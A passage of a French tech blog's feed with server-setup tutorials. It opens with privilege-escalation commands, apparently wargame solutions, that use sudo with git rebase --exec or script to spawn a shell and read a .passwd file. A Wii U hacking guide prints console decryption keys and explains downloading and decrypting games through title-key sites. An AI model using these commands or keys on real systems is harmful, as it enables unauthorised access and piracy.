git add .
git commit -m "a"
chmod -R 777 .git
sudo -u app-script-ch14-11 git rebase --interactive --exec "/bin/bash" HEAD</p>
<p># User 12</p>
<p>vim /tmp/po {/bin/bash}
chmod 777 /tmp/po
sudo -u app-script-ch14-13 /usr/bin/script /tmp/po</p>
<h1>User 13</h1>
<p>mapfile -t a < ../.passwd
echo $a</p>My First Review2010-12-03T10:20:00+01:002010-12-03T10:20:00+01:00nlegalltag:blog.nlegall.fr,2010-12-03:/my-first-review.html<p>Following is a review of my favorite mechanical keyboard.</p>PureFTP2010-12-03T10:20:00+01:002010-12-03T10:20:00+01:00nlegalltag:blog.nlegall.fr,2010-12-03:/pureftp.html<p><img alt="" src="https://img.nlegall.fr/yiVJKBEe"></p>
<h1>Présentation</h1>
<p>Pure-FTPd is a free (BSD), secure, production-quality and standard-conformant FTP server. It doesn't provide useless bells and whistles, but focuses on efficiency and ease of use. It provides simple answers to common needs, plus unique useful features for personal users as well as hosting providers. </p>
<h1>Installation</h1>
<div class="highlight"><pre><span></span><code>apt install pure-ftpd …</code></pre></div><p><img alt="" src="https://img.nlegall.fr/yiVJKBEe"></p>
<h1>Présentation</h1>
<p>Pure-FTPd is a free (BSD), secure, production-quality and standard-conformant FTP server. It doesn't provide useless bells and whistles, but focuses on efficiency and ease of use. It provides simple answers to common needs, plus unique useful features for personal users as well as hosting providers. </p>
<h1>Installation</h1>
<div class="highlight"><pre><span></span><code>apt install pure-ftpd pureadmin
</code></pre></div>
<h1>Configuration</h1>
<p>La configuration permet d'avoir un serveur FTP avec des utilisateurs virtuels (complètement indépendant des comptes linux) ainsi que les connections et transferts chiffrés via TLS (explicite sur le port 21).</p>
<h2>Utilisateur</h2>
<p>Cette opération est à réaliser autant de fois que vous souhaitez avoir d'utilisateurs autorisés à ce connecter sur le serveur.</p>
<div class="highlight"><pre><span></span><code>pure-pw useradd user -u ftpuser -d /home/ftpusers/user -j
pure-pw passwd user -m
pure-pw mkdb
</code></pre></div>
<h2>SSL/TLS</h2>
<p>Permet d'activer le chiffrement sur les commandes et les données envoyées/reçues vers/depuis le serveur.</p>
<div class="highlight"><pre><span></span><code>mkdir -p /etc/ssl/private
openssl dhparam -out /etc/ssl/private/pure-ftpd-dhparams.pem <span class="m">2048</span>
openssl req -x509 -nodes -newkey rsa:2048 -sha256 -keyout /etc/ssl/private/pure-ftpd.pem -out /etc/ssl/private/pure-ftpd.pem
chmod <span class="m">600</span> /etc/ssl/private/*.pem
<span class="c1"># Seulement TLS d'autorisé</span>
<span class="nb">echo</span> <span class="m">2</span> > /etc/pure-ftpd/conf/TLS
/etc/init.d/pure-ftpd restart
</code></pre></div>Roundcubemail2010-12-03T10:20:00+01:002010-12-03T10:20:00+01:00nlegalltag:blog.nlegall.fr,2010-12-03:/roundcubemail.html<h1>Présentation</h1>
<p><img alt="" src="https://img.nlegall.fr/hgBMeCUM"></p>
<p>Roundcube is a web-based IMAP email client. Roundcube's most prominent feature is the pervasive use of Ajax technology. After about two years of development, the first stable release of Roundcube was announced in early 2008.</p>
<p>Roundcube is written in PHP and can be employed in conjunction with a LAMP …</p><h1>Présentation</h1>
<p><img alt="" src="https://img.nlegall.fr/hgBMeCUM"></p>
<p>Roundcube is a web-based IMAP email client. Roundcube's most prominent feature is the pervasive use of Ajax technology. After about two years of development, the first stable release of Roundcube was announced in early 2008.</p>
<p>Roundcube is written in PHP and can be employed in conjunction with a LAMP "stack", or any other operating systems that support PHP are supported as well. The web server needs access to the IMAP server hosting the email and to an SMTP server to be able to send mails.</p>
<p>Roundcube is free and open-source software subject to the terms of the GNU General Public License (GPL) with exceptions for skins and plugins.</p>
<h1>Installation</h1>
<h2>Pré-requis</h2>
<div class="highlight"><pre><span></span><code>apt-get install php5-fpm php5-mysql php5-pspell php5-curl
</code></pre></div>
<h2>Roundcubemail</h2>
<p>Les paquets présents dans les distributions étant souvent en retard, nous allons prendre directement la dernière version stable disponible.</p>
<div class="highlight"><pre><span></span><code>wget http://sourceforge.net/projects/roundcubemail/files/latest/download?source<span class="o">=</span>files -O roundcubemail.tar.gz
tar -zxfv roundcubemail.tar.gz -C /var/www/html/
mv /var/www/html/roundcubemail-* /var/www/html/roundcubemail
chown -R www-data:root /var/www/html/roundcubemail
</code></pre></div>
<h2>Configuration serveur web</h2>
<h2>PHP</h2>
<div class="highlight"><pre><span></span><code><span class="x">upload_max_filesize = 50M</span>
<span class="x">post_max_size = 50M</span>
</code></pre></div>
<h2>Apache</h2>
<div class="highlight"><pre><span></span><code><span class="nt"><VirtualHost</span> <span class="s">*:80</span><span class="nt">></span>
<span class="nb">ServerName</span> roundcube.hostname.tld
<span class="nb">ServerAdmin</span> admin@hostname.tld
<span class="nb">DocumentRoot</span> <span class="sx">/var/www/html/roundcubemail</span>
<span class="nt"><Directory</span> <span class="s">/var/www/html/roundcubemail</span><span class="nt">></span>
<span class="nb">AllowOverride</span> <span class="k">All</span>
<span class="nb">Order</span> Allow,Deny
<span class="nb">Allow</span> from <span class="k">All</span>
<span class="nt"></Directory></span>
<span class="nt"></VirtualHost></span>
</code></pre></div>
<h2>nginx</h2>
<div class="highlight"><pre><span></span><code><span class="k">server</span> <span class="p">{</span>
<span class="kn">listen</span> <span class="mi">80</span><span class="p">;</span>
<span class="kn">server_name</span> <span class="s">roundcube.hostname.tld</span><span class="p">;</span>
<span class="kn">root</span> <span class="s">/var/www/html/roundcubemail</span><span class="p">;</span>
<span class="kn">index</span> <span class="s">index.php</span> <span class="s">index.html</span><span class="p">;</span>
<span class="kn">client_max_body_size</span> <span class="s">50M</span><span class="p">;</span>
<span class="kn">location</span> <span class="p">~</span> <span class="sr">^/favicon.ico$</span> <span class="p">{</span>
<span class="kn">root</span> <span class="s">/var/www/html/roundcubemail/web/skins/default/images</span><span class="p">;</span>
<span class="kn">log_not_found</span> <span class="no">off</span><span class="p">;</span>
<span class="kn">access_log</span> <span class="no">off</span><span class="p">;</span>
<span class="kn">expires</span> <span class="s">max</span><span class="p">;</span>
<span class="p">}</span>
<span class="kn">location</span> <span class="p">=</span> <span class="s">/robots.txt</span> <span class="p">{</span>
<span class="kn">allow</span> <span class="s">all</span><span class="p">;</span>
<span class="kn">log_not_found</span> <span class="no">off</span><span class="p">;</span>
<span class="kn">access_log</span> <span class="no">off</span><span class="p">;</span>
<span class="p">}</span>
<span class="kn">location</span> <span class="p">~</span> <span class="sr">^/(README|INSTALL|LICENSE|CHANGELOG|UPGRADING)$</span> <span class="p">{</span>
<span class="kn">deny</span> <span class="s">all</span><span class="p">;</span>
<span class="p">}</span>
<span class="kn">location</span> <span class="p">~</span> <span class="sr">^/(bin|SQL)/</span> <span class="p">{</span>
<span class="kn">deny</span> <span class="s">all</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1"># Deny all attempts to access hidden files such as .htaccess or .htpasswd.</span>
<span class="kn">location</span> <span class="p">~</span> <span class="sr">/\.</span> <span class="p">{</span>
<span class="kn">deny</span> <span class="s">all</span><span class="p">;</span>
<span class="kn">access_log</span> <span class="no">off</span><span class="p">;</span>
<span class="kn">log_not_found</span> <span class="no">off</span><span class="p">;</span>
<span class="p">}</span>
<span class="kn">location</span> <span class="p">~</span> <span class="sr">\.php$</span> <span class="p">{</span>
<span class="kn">try_files</span> <span class="nv">$uri</span> <span class="p">=</span><span class="mi">404</span><span class="p">;</span>
<span class="kn">include</span> <span class="s">/etc/nginx/fastcgi_params</span><span class="p">;</span>
<span class="kn">fastcgi_pass</span> <span class="n">127.0.0.1</span><span class="p">:</span><span class="mi">9000</span><span class="p">;</span>
<span class="kn">fastcgi_param</span> <span class="s">SCRIPT_FILENAME</span> <span class="nv">$document_root$fastcgi_script_name</span><span class="p">;</span>
<span class="kn">fastcgi_index</span> <span class="s">index.php</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
</code></pre></div>
<h2>Base de données</h2>
<div class="highlight"><pre><span></span><code>mysql -u root -p
</code></pre></div>
<div class="highlight"><pre><span></span><code><span class="k">CREATE</span> <span class="k">DATABASE</span> <span class="n">roundcube</span><span class="p">;</span>
<span class="k">GRANT</span> <span class="k">ALL</span> <span class="k">PRIVILEGES</span> <span class="k">ON</span> <span class="n">roundcube</span><span class="p">.</span><span class="o">*</span> <span class="k">TO</span> <span class="n">roundcube</span><span class="o">@</span><span class="n">localhost</span> <span class="n">IDENTIFIED</span> <span class="k">BY</span> <span class="ss">"password"</span><span class="p">;</span>
<span class="n">FLUSH</span> <span class="k">PRIVILEGES</span><span class="p">;</span>
<span class="n">quit</span>
</code></pre></div>
<h1>Configuration</h1>
<p>http://roundcube.hostname.tld</p>
<h1>Pluggins</h1>
<p>Pour installer un pluggin :</p>
<div class="highlight"><pre><span></span><code><span class="nb">cd</span> /var/www/html/roundcubemail/plugins
wget url_du_pluggin
tar xzfv pluggin.tar.gz
<span class="c1"># vim ../config/config.inc.php</span>
</code></pre></div>
<p>http://trac.roundcube.net/wiki/Dev_Encryption
http://mattrude.com/projects/roundcube-fail2ban-plugin/
https://github.com/cosminadrianpopescu/markdown_editor
http://trac.roundcube.net/browser/github/plugins/emoticons
http://www.stremlau.net/html5_notifier/
http://trac.roundcube.net/browser/github/plugins/vcard_attachments
https://github.com/kepi/show-gravatar
http://trac.roundcube.net/browser/github/plugins/password
https://plugins.roundcube.net/packages/johndoh/sauserprefs
https://github.com/northox/roundcube-yubikey-plugin
https://github.com/eagle00789/RC_Filters</p>TOIP2010-12-03T10:20:00+01:002010-12-03T10:20:00+01:00nlegalltag:blog.nlegall.fr,2010-12-03:/toip.html<h1>Définitions</h1>
<p><strong>VoIP</strong> : concept de transport de la voix en s'appuyant sur le réseau IP</p>
<p><strong>ToIP</strong> : Solution de téléphonie basé sur l'utilisation d'un réseau IP. Cette solution peut reposer sur la VoIP de bout en bout</p>
<p><strong>RTC</strong> : Réseau téléphonique commuté</p>
<p><strong>RNIS</strong> : Réseau numérique à intégration de service</p>
<p><strong>MIC</strong> : Modulation d'impulsion codée …</p><h1>Définitions</h1>
<p><strong>VoIP</strong> : concept de transport de la voix en s'appuyant sur le réseau IP</p>
<p><strong>ToIP</strong> : Solution de téléphonie basé sur l'utilisation d'un réseau IP. Cette solution peut reposer sur la VoIP de bout en bout</p>
<p><strong>RTC</strong> : Réseau téléphonique commuté</p>
<p><strong>RNIS</strong> : Réseau numérique à intégration de service</p>
<p><strong>MIC</strong> : Modulation d'impulsion codée. Permet de faire circuler sur un lien physique le contenu d'un ensemble de liaison à 64K.</p>
<p><strong>SDH</strong> : Synchronous Digital Hierarchy. Correspond au multiplexage d'un ensemble de trames MIC.</p>
<p><strong>Signalisation</strong> : Ensemble des informations véhiculées en plus de la voix.</p>
<p><strong>Erlang</strong> : unité de mesure qui correspond au temps moyen d'utilisation d'une ligne téléphonique sur un intervalle temps d'une heure.</p>
<ul>
<li>Calcul du nombre d'Erlang (les temps en heure) : E = ( NB appels externes x durée moyenne ) / Intervalle de temps considéré</li>
<li>Détermine le seuil de probabilité de perte acceptable</li>
<li>Report dans le tableau d'Erlang</li>
</ul>
<p><strong>AN</strong> : Acces network</p>
<p><strong>POTS</strong> : Plain old telephone service</p>
<p><strong>H.323</strong> : ensemble de protocoles en charge de la signalisation d'appels véhiculé par des réseaux IP. Il est chargé de la signalisation. Il est normalisé mais diffère entre principaux constructeurs. Dans ce cas, SIP sera plus conseillé.</p>
<p><strong>SIP</strong> : Session Initiation Protocol. Protocole issu du monde internet, très répandu et standardisé (RFC3261). Repose sur UDP.</p>
<ul>
<li>SIP Registrar : équipement responsable de l'enregistrement des clients disponibles de son domaine SIP (statut et adresse IP)</li>
<li>Proxy SIP : point de contact du User Agent Client qui va lui permettre de connaître l'adresse du User Agent Server recherché</li>
</ul>
<p><strong>Gatekeeper</strong> : Fourni l'adresse IP du téléphone du destinataire ainsi que l'autorisation d'appel. Sans cet équipement, aucun appel à l'extérieur n'est possible.</p>
<p><strong>NGN</strong> : Next Generation Network. Un seul réseau pour le transport de RTC et des données.</p>
<p><strong>Mediagateway</strong> : Permet la conversion de flux audio/vidéo pour différents réseaux de communication.</p>
<p><strong>Gigue</strong> : Variation du délai de latence.</p>
<p><strong>Echo électrique</strong> : Echo lié aux technologies de transport</p>
<p><strong>Echo acoustique</strong> : Echo lié à la captation du son par le micro</p>
<p><strong>PABX</strong> : Private Automatique Branch eXchange. Permet de gérer les communications internes et externes à l'organisation. Version IP -> IPBX</p>
<h1>Niveaux de commutation</h1>
<h2>CAA</h2>
<p><em>Commutateur à autonomie d'acheminement</em></p>
<p>Permet de mettre en relattion les clients d'une même zone géographique.</p>
<h2>CTS (principal/secondaire)</h2>
<p><em>Centre de transit</em></p>
<p>Permet l'acheminement entre plusieurs CAA.</p>
<h2>CTI</h2>
<p><em>Centre de transit international</em></p>
<p>Permet l'acheminement vers l'international.</p>
<h1>Numérisation de la voix</h1>
<p>La plage de fréquence utilisée est échantillonnée de 300 a 3400Hz. Les échantillons sont codés sur 8bits toutes les 125 μs. Il faut donc une ligne avec un débit de 64kbits pour faire transiter un appel (8 x 8000 = 64000).</p>
<h1>Communication</h1>
<h2>Transport de la voix</h2>
<p>Le délai d’acheminement des informations doit être le plus court possible, le plus constant et respecter la chronologie. Les deux protocoles utilisés sont RTP (Real Time Procole, UDP) et RTCP (Real Time Control Protocole, TCP).</p>
<p>Le mixeur permet la centralisation des informations des paquets RTP de plusieurs participants : conférence.</p>
<p>Le traducteur intervient sur les paquets RTP afin de permettre la modification de l'encodage et le passage des pare-feux (multicast - unicast).</p>
<h2>Seuils optimums</h2>
<table>
<thead>
<tr>
<th></th>
<th>Seuils acceptables</th>
<th>Seuil critique</th>
</tr>
</thead>
<tbody>
<tr>
<td>Perte de paquets</td>
<td><1%</td>
<td><3%</td>
</tr>
<tr>
<td>Délais de latence</td>
<td><100ms</td>
<td><200ms</td>
</tr>
<tr>
<td>Gigue</td>
<td><40ms</td>
<td><75ms</td>
</tr>
</tbody>
</table>
<h1>Qualité de service</h1>
<p><em>Requière le support des protocoles 802.1p, 802.1q, RSVP...</em></p>
<p>Elle permet de fixer des limites sur l'usage de la bande passante et d’établir une priorisation des flux.</p>
<p><img alt="" src="https://lut.im/37bDb4KrbD/dH9kyGgfxv1Z8AXj"></p>
<p>Pour la voix, cela permet :</p>
<ul>
<li>Délai de bout en bout réduit au minimum</li>
<li>Gigue le plus faible possible</li>
<li>Bande passante garantie</li>
</ul>Vim2010-12-03T10:20:00+01:002010-12-03T10:20:00+01:00nlegalltag:blog.nlegall.fr,2010-12-03:/vim.html<h2>Installation du gestionnaire de plugins</h2>
<div class="highlight"><pre><span></span><code>git clone https://github.com/VundleVim/Vundle.vim.git ~/.vim/bundle/Vundle.vim
vim ~/.vimrc
</code></pre></div>
<div class="highlight"><pre><span></span><code> <span class="k">set</span> <span class="nb">nocompatible</span> <span class="c">" be iMproved, required</span>
<span class="k">filetype</span> off <span class="c">" required</span>
<span class="c"> " set the runtime path to include Vundle and initialize</span>
<span class="k">set</span> <span class="nb">rtp</span><span class="p">+=~</span><span class="sr">/.vim/</span>bundle/Vundle.<span class="k">vim</span>
<span class="k">call</span> vundle#begin<span class="p">()</span>
<span class="c"> " alternatively, pass a path …</span></code></pre></div><h2>Installation du gestionnaire de plugins</h2>
<div class="highlight"><pre><span></span><code>git clone https://github.com/VundleVim/Vundle.vim.git ~/.vim/bundle/Vundle.vim
vim ~/.vimrc
</code></pre></div>
<div class="highlight"><pre><span></span><code> <span class="k">set</span> <span class="nb">nocompatible</span> <span class="c">" be iMproved, required</span>
<span class="k">filetype</span> off <span class="c">" required</span>
<span class="c"> " set the runtime path to include Vundle and initialize</span>
<span class="k">set</span> <span class="nb">rtp</span><span class="p">+=~</span><span class="sr">/.vim/</span>bundle/Vundle.<span class="k">vim</span>
<span class="k">call</span> vundle#begin<span class="p">()</span>
<span class="c"> " alternatively, pass a path where Vundle should install plugins</span>
<span class="c"> "call vundle#begin('~/some/path/here')</span>
<span class="c"> " let Vundle manage Vundle, required</span>
Plugin <span class="s1">'VundleVim/Vundle.vim'</span>
<span class="c"> " Add your plugins here</span>
<span class="c"> " All of your Plugins must be added before the following line</span>
<span class="k">call</span> vundle#<span class="k">end</span><span class="p">()</span> <span class="c">" required</span>
<span class="k">filetype</span> plugin indent <span class="k">on</span> <span class="c">" required</span>
</code></pre></div>
<h2>ColorSheme</h2>
<p>Ajouter la ligne suivante dans le fichier ~/.vimrc :</p>
<div class="highlight"><pre><span></span><code>Plugin <span class="s1">'mhartington/oceanic-next'</span>
</code></pre></div>
<p>et</p>
<div class="highlight"><pre><span></span><code><span class="c">" Theme</span>
<span class="nb">syntax</span> enable
<span class="k">set</span> <span class="nb">t_Co</span><span class="p">=</span><span class="m">256</span>
<span class="k">colorscheme</span> OceanicNext
<span class="k">set</span> <span class="nb">background</span><span class="p">=</span><span class="nb">dark</span>
</code></pre></div>
<p>Taper la commande suivante : <code>vim +PluginInstall +qall</code></p>
<h2>Syntaxe manquante</h2>
<h3>nginx</h3>
<div class="highlight"><pre><span></span><code><span class="nb">cd</span> ~
wget -O nginx.vim http://www.vim.org/scripts/download_script.php<span class="se">\?</span>src_id<span class="se">\=</span><span class="m">19394</span>
mkdir -p ~/.vim/syntax
mv nginx.vim ~/.vim/syntax/
<span class="c1"># vim ~/.vim/filetype.vim</span>
au BufRead,BufNewFile /etc/nginx/*,/usr/local/nginx/conf/* <span class="k">if</span> <span class="p">&</span><span class="nv">ft</span> <span class="o">==</span> <span class="s1">''</span> <span class="p">|</span> setfiletype nginx <span class="p">|</span> endif
</code></pre></div>WiiU2010-12-03T10:20:00+01:002010-12-03T10:20:00+01:00nlegalltag:blog.nlegall.fr,2010-12-03:/wiiu.html<p><img alt="" src="https://img.nlegall.fr/hnyAs55a"></p>
<p>La Wii U (ウィー ユー, Wī Yū?) est une console de jeu vidéo commercialisée par Nintendo, succédant à la Wii. Elle est sortie le 18 novembre 2012 en Amérique du Nord, le 30 novembre 2012 en Europe et le 8 décembre 2012 au Japon. Première console de jeu vidéo de …</p><p><img alt="" src="https://img.nlegall.fr/hnyAs55a"></p>
<p>La Wii U (ウィー ユー, Wī Yū?) est une console de jeu vidéo commercialisée par Nintendo, succédant à la Wii. Elle est sortie le 18 novembre 2012 en Amérique du Nord, le 30 novembre 2012 en Europe et le 8 décembre 2012 au Japon. Première console de jeu vidéo de huitième génération à sortir, elle est en concurrence avec la PlayStation 4 et la Xbox One.</p>
<p>Le dernier firmware en date (5.5.1) possédant un hax, la console devient d'autant plus intéressante. Vous pouvez lancer des jeux (hors zonage possible), les homebrew disponibles et sauvegarder vos jeux sur un stockage USB ou carte SD.</p>
<h1>Vocabulaire</h1>
<ul>
<li>Homebrew : jeux vidéo ou logiciel qui sont produits par des consommateurs sur des plates-formes de jeux propriétaires</li>
<li>NAND : Mémoire flash</li>
<li>sysNAND : NAND contenant tous les logiciels système, le système d'exploitation, le bootloader, etc.</li>
<li>redNAND : C'est la copie de la nand de votre sysNAND sur la carte SD, elle vous protégera contre de mauvaise manipulation ou si vous installez de mauvais titres (jeux JAP sur console EU) ou autres. Nécessite une carte SD de grosse capacitée (dépend de la version de votre Wii U).</li>
</ul>
<h1>Carte SD</h1>
<p>L'avantage de la carte SD est le faible cout pour une grande capacité. Cependant, Windows ne permet pas de formater les cartes SD de grande capacité dans le format FAT32. Il faut donc passer par ces deux utilitaires suivant afin de faire cette opération et la rendre compatible avec la WiiU.</p>
<p>http://www.touslesdrivers.com/index.php?v_page=23&v_code=34812
http://www.ridgecrop.demon.co.uk/index.htm?fat32format.htm</p>
<div class="highlight"><pre><span></span><code><span class="err">fat32format -c128 LETTRE:</span>
</code></pre></div>
<h1>HomeBrew</h1>
<p>Mettre sur la carte SD l'ensemble des fichiers suivants à la racine :</p>
<p>https://www.dropbox.com/s/pc93l60jbuwqawi/Archive.zip?dl=0</p>
<p>Se rendre dans les paramètres de la console, paramètres réseaux et changer les DNS : <code>107.211.140.065</code></p>
<p>Lancer le navigateur Web de la console. Il faut d'abord vider les cookies et ce, à chaque fois avant de se rendre sur le site http://googiehax.xyz/index.html.</p>
<p>Choisir la version du firmware de sa console et choisir ensuite Homebrew.</p>
<p>La console devrait lancer une vidéo puis un écran blanc. Le menu du Homebrew Launcher devrait ensuite apparaître.</p>
<p>Une base de homebrew sera disponible mais si vous souhaitez en ajouter d'autre, vous pouvez vous rendre sur http://www.wiiubru.com/appstore/#/ afin de les ajouter sur la carte SD dans le dossier <code>SD:/wiiu/apps/HOMEBREWNAME</code>.</p>
<p>Enjoy :D</p>
<h2>Homebrew utiles</h2>
<p>||Nom|Utilité|
|---|---|
|<img alt="" src="https://img.nlegall.fr/evTfExBz">|Loadiine GX2|Lancer des jeux Wii U|
|<img alt="" src="https://img.nlegall.fr/Obnks0Ap">|HB App Store|Ajoute des homebrew directement sur la carte SD|
|<img alt="" src="https://img.nlegall.fr/zH7K0yCy">|FTPiiU|Serveur FTP (envoie et réception)|
|<img alt="" src="https://img.nlegall.fr/Ol03DJpN">|tik2sd|Récupère les tickets pour les jeux présents sur la Wii U|
|<img alt="" src="https://img.nlegall.fr/yZuCILrk">|OurLoader|Dézonage d'un jeux physique|
|<img alt="" src="https://img.nlegall.fr/9Ss39rXC">|Mocha CFW|Dévérouille le firmware de la console|
|<img alt="" src="https://img.nlegall.fr/C7b6L6JA">|WUP installer y Mod|Installation sur clé USB des jeux/updates/DLC|
|<img alt="" src="">|Wii U NAND Dumper|Dump des NANDs de la console|
|<img alt="" src="">|wuphax|Hack le mode vWii directement depuis le menu WiiU|</p>
<h1>Amiibo</h1>
<p>https://github.com/masterchan-777/TagMo - https://gbatemp.net/threads/shane9b3-s-amiibo-cards.465383/ https://imgur.com/a/NP2at/layout/horizontal#0</p>
<h1>Lancer des jeux</h1>
<p>Il faut mettre les jeux dans le dossier <code>SD:/wiiu/games</code> suivant le nomage suivant :</p>
<div class="highlight"><pre><span></span><code><span class="n">WiiU</span><span class="w"> </span><span class="n">Game</span><span class="s1">'s Title [TitleID6]/</span>
<span class="s1">Virtual console Game'</span><span class="n">s</span><span class="w"> </span><span class="n">Title</span><span class="w"> </span><span class="o">[</span><span class="n">TitleID4</span><span class="o">]/</span><span class="w"></span>
</code></pre></div>
<p>exemple : <code>SD:/wiiu/games/Super Mario Maker [AMAE01]/</code></p>
<p>Le TitleID peut être trouver dans le fichier XML présent dans les fichiers du jeux ou sur le site http://www.gametdb.com/WiiU.</p>
<p>L'ensemble des titres compatibles avec Loadiine est disponible sur http://wiki.gbatemp.net/wiki/Loadiine_compatibility_list.</p>
<p>https://gbatemp.net/threads/list-of-web-hosts-for-homebrew-exploit.429943/
https://gbatemp.net/threads/the-definitive-vwii-hacking-guide.425852/</p>
<h1>FTP</h1>
<p>Il est possible si vous ne souhaitez pas passer par votre ordinateur pour copier les jeux sur la carte SD d'utiliser un serveur FTP. Il faudra alors se connecter avec FileZilla ou tout autre client FTP à l'IP que XXXX vous affichera lors de son lancement.</p>
<p>Vous aurez ensuite accès à l'ensemble de la carte SD. Vous pouvez donc envoyer le dossier de votre jeux dans le dossier <code>SD:/wiiu/games</code>.</p>
<h1>Récupérer les jeux</h1>
<h2>UWizard</h2>
<p><em>Vous devez récuper les Visual C++ Redistributable Packages en 32 et 64 bits : https://www.microsoft.com/en-us/download/details.aspx?id=40784</em></p>
<p>https://github.com/MrMysterio/Uwizard</p>
<p>Afin de pouvoir déchiffrer l'ensemble des fichiers récupérer depuis les CDN de Nintendo, il vous faut ajouter les trois clés présentes dans les options de Uwizard :</p>
<div class="highlight"><pre><span></span><code><span class="err">Wii U Common Key : D7B00402659BA2ABD2CB0DB27FA2B656</span>
<span class="err">Wii U Espresso Ancast Key : 805E6285CD487DE0FAFFAA65A6985E17</span>
<span class="err">Wii U Starbuck Ancast Key : B5D8AB06ED7F6CFC529F2CE1B4EA32FD</span>
</code></pre></div>
<p><img alt="" src="https://img.nlegall.fr/UkVLGuEl"></p>
<p>Un fois ces clés renseignées, il vous l'ID du jeux que vous souhaitez. Il peut être trouver sur http://wiiubrew.org/wiki/Title_database.</p>
<p><img alt="" src="https://img.nlegall.fr/4HKAxAS8"></p>
<p>Vous pouvez cocher la case pour déchiffrer les fichiers après la fin du téléchargement. Il vous sera également demander d'avoir le ticket correspondant au jeux (avec la bonne zone : EUR, USA ou JAP). Vous pouvez les trouver sur https://wiiu.titlekeys.com/.</p>
<p>Vous aurez alors les trois dossiers contenant les fichiers du jeux. Il faut ensuite les copier sur la carte SD sous la forme WiiU Game's Title [TitleID6].</p>
<h2>Wii U USB Helper</h2>
<p><em>http://application.wiiuusbhelper.com/Updater.exe</em></p>
<p>Sûrement l'une des applications de gestion de jeux les plus abouties qui existe actuellement. Elle permet de télécharger les jeux, dlc et mise à jour. Elle permet de gérer l'ensemble de ces jeux et de les copier directement sur une carte SD.</p>
<p><img alt="" src="https://img.nlegall.fr/XMCePnnq"></p>
<p>Une recherche est disponible avec plusieurs de filtres et téléchargement de plusieurs à la suite (gestion d'une file d'attente).</p>
<h1>Jeux/DLC/Update</h1>
<p><img alt="" src="https://i.imgur.com/kNxZFcI.png"></p>
<p>Si vous souhaitez avoir l'ensemble des DLCs également avec votre jeux, il vous faudra utiliser une autre manipulation comme Loadiine ne supporte pas les DLCs (seulement les mises à jour). Vous aurez besoin d'un clé USB formatée sur la Wii U pour éviter tout soucis de compatibilité.</p>
<p>Pour les jeux, on peut les récupérer via Wii U USB Helper mais il faut alors ne pas les unpack/decrypt. Il faut ensuite copier le dossier ainsi récupérer dans le dossier <code>SD:/install</code>.</p>
<p>Vous aurez besoin de Mocha CFW. Vous pouvez le récuéprer directement via le Homebrew App Store (https://github.com/vgmoose/hbas/releases) ou en téléchargeant drirectement le <code>.elf</code> sur le dépôt GH : https://github.com/dimok789/mocha/releases. Si vous ne n'avez pas wupinstaller, je vous conseille de récupérer la version modifiée ici : https://github.com/Yardape8000/wupinstaller/releases. Elle permet d'installer plusieurs dossiers d'un coup en les sélectionnant.</p>
<h2>Procédure</h2>
<ol>
<li>Lancer le Homebrew Launcher via http://loadiine.ovh</li>
<li>Sélectionner Mocha CWF</li>
<li>Relancer le Homebrew Launcher</li>
<li>Lancer WUP Installer</li>
<li>Sélectionner les jeux à installer sur la clé USB</li>
<li>Done :D</li>
</ol>
<p>Pour lancer les jeux par la suite, il faut refaire les étapes 1 et 2 afin que la console autorise les jeux avec mises à jour et DLC.</p>
<h1>Emulateur GameCube</h1>ZNC2010-12-03T10:20:00+01:002010-12-03T10:20:00+01:00nlegalltag:blog.nlegall.fr,2010-12-03:/znc.html<p><img alt="" src="https://img.nlegall.fr/yT3qDTjk"></p>
<h1>Fonctionnement</h1>
<p>ZNC est un bouncer IRC.</p>
<p><img alt="" src="https://img.nlegall.fr/vwOYtNXh"></p>
<p>Il se connecte sur l'ensemble des serveurs IRC et maintien ainsi la connexion active. Cela permet de garder l'ensemble des messages échangés lors de la déconnexion de l'utilisateur. Il propose également tout un ensemble d'options permettant de gérer ces serveurs et channels.</p>
<h1>Installation</h1>
<div class="highlight"><pre><span></span><code>apt …</code></pre></div><p><img alt="" src="https://img.nlegall.fr/yT3qDTjk"></p>
<h1>Fonctionnement</h1>
<p>ZNC est un bouncer IRC.</p>
<p><img alt="" src="https://img.nlegall.fr/vwOYtNXh"></p>
<p>Il se connecte sur l'ensemble des serveurs IRC et maintien ainsi la connexion active. Cela permet de garder l'ensemble des messages échangés lors de la déconnexion de l'utilisateur. Il propose également tout un ensemble d'options permettant de gérer ces serveurs et channels.</p>
<h1>Installation</h1>
<div class="highlight"><pre><span></span><code>apt install build-essential libssl-dev libperl-dev pkg-config libicu-dev
wget http://znc.in/releases/znc-1.6.4.tar.gz
tar -xzvf znc-1.6.4.tar.gz
<span class="nb">cd</span> znc-1.6.4
./configure
make
make install
</code></pre></div>
<h1>Configuration</h1>
<p>Conseils : activé le SSL et ne pas ajouter directement de network. Cela peut se faire après via l'interface web.</p>
<div class="highlight"><pre><span></span><code>znc --makeconf
</code></pre></div>
<h1>Interface Web</h1>
<p><img alt="" src="https://img.nlegall.fr/Khz8DRRw"></p>
<p>L'ensemble de la configuration peut être faite par la suite via l'interface web :</p>
<ul>
<li>Ajout de réseau avec leurs chan respectifs</li>
<li>Création d'utilisateur</li>
<li>Configuration des add-ons souhaités</li>
</ul>
<h1>Client</h1>
<p>Dans votre client IRC, il faut alors ajouter un réseau de la manière suivante : </p>
<p><img alt="" src="https://img.nlegall.fr/SuWyT6eN"></p>Bash2010-11-24T10:20:00+01:002010-11-24T10:20:00+01:00nlegalltag:blog.nlegall.fr,2010-11-24:/bash.html<p><img alt="" src="https://img.nlegall.fr/1xRskUwR"></p>
<h2>Présentation</h2>
<p>Bash (acronyme de Bourne-Again shell) est un interpréteur en ligne de commande de type script. C'est le shell Unix du projet GNU.</p>
<p>Fondé sur le Bourne shell, Bash lui apporte de nombreuses améliorations, provenant notamment du Korn shell et du C shell. Bash est un logiciel libre publié sous …</p><p><img alt="" src="https://img.nlegall.fr/1xRskUwR"></p>
<h2>Présentation</h2>
<p>Bash (acronyme de Bourne-Again shell) est un interpréteur en ligne de commande de type script. C'est le shell Unix du projet GNU.</p>
<p>Fondé sur le Bourne shell, Bash lui apporte de nombreuses améliorations, provenant notamment du Korn shell et du C shell. Bash est un logiciel libre publié sous licence publique générale GNU. Il est l'interprète par défaut sur de nombreux Unix libres, notamment sur les systèmes GNU/Linux. C'est aussi le shell par défaut de Mac OS X et il a été porté sous Microsoft Windows par le projet Cygwin.</p>
<h2>Opérateurs logiques</h2>
<div class="highlight"><pre><span></span><code>-eq <span class="c1"># Egale</span>
-ne <span class="c1"># Non égale</span>
-gt <span class="c1"># Plus grand que</span>
